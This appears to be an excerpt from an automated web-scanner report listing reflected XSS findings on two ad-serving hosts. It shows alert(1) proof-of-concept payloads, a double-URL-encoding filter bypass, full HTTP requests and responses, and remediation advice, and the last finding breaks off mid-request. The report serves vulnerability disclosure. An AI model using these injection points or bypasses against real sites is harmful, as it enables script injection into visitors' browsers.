2.32. http://ads.bridgetrack.com/a/f/ [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab3afffadfe was submitted in the click parameter. This input was echoed as 79b20"><script>alert(1)</script>ab3afffadfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the click request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D79b20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab3afffadfe HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:47 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955468&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=15FE115810EC4523BC5C719BDE80E40F&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=62547d163AJSc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=7186BD565AE2492385F1A401103DFFD5; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:47 GMT
Connection: close
Content-Length: 4145

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
YXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=79b20"><script>alert(1)</script>ab3afffadfehttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%26" target="_blank">
...[SNIP]...

2.33. http://ads.bridgetrack.com/a/f/ [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb598"%3balert(1)//c0e3dd2568c was submitted in the click parameter. This input was echoed as cb598";alert(1)//c0e3dd2568c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3Dcb598"%3balert(1)//c0e3dd2568c HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:48 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955468&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=CD678184DD024D26B47E5B1FC3D62359&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=62547d163AJSc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=F4E325FEC9FF4A6BAEE218756F8E1A14; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:47 GMT
Connection: close
Content-Length: 4094

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
YXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=cb598";alert(1)//c0e3dd2568chttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%26";var lf="clickTAG=http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBjmhu
...[SNIP]...

2.34. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f316"-alert(1)-"6f5923542da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D&9f316"-alert(1)-"6f5923542da=1 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:49 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955470&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=C611BC732A90492BA8B8FFE669900A1F&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=24466d163AJUc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=A46B821B06334D749A3994F83C6F626A; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:49 GMT
Connection: close
Content-Length: 4088

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%269f316"-alert(1)-"6f5923542da=1";var lf="clickTAG=http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf%5FqZXkD4OtlZQCs5%5FthR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6%5F%5F%5F%5F%5FwFgyYaFiYikhBCgAb3
...[SNIP]...

2.35. http://ads.pointroll.com/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df7b"%3balert(1)//cbd4ff35fc6 was submitted in the r parameter. This input was echoed as 4df7b";alert(1)//cbd4ff35fc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.6990757603198294df7b"%3balert(1)//cbd4ff35fc6 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.6990757603198294df7b";alert(1)//cbd4ff35fc6&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.36. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45bbf"-alert(1)-"3da21f59ef8 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$45bbf"-alert(1)-"3da21f59ef8&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$45bbf"-alert(1)-"3da21f59ef8&time=1|10:39|-5&r=0.699075760319829&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.37. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8667f"%3balert(1)//4dd79ad4bda was submitted in the time parameter. This input was echoed as 8667f";alert(1)//4dd79ad4bda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-58667f"%3balert(1)//4dd79ad4bda&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; 